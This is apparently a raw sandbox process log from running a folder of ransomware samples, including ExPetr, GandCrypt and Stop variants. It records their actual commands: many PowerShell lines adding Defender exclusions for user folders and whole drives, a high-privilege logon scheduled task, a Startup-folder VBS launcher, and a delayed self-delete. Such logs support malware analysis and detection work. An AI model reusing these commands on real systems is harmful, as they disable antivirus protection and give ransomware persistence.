C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Links
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Contacts
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Music
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\OneDrive
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Favorites
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Searches
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Videos
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "D:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "E:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "F:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "G:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "H:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "Z:\
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe
HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5864 -ip 5864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5864 -s 380
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Searches
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Contacts
C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Favorites
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Music
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "D:\
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Videos
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "G:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "H:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Links
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "E:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "F:\
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "Z:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\OneDrive
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe
HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a.exe
HEUR-Trojan.MSIL.Crypt.gen-985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
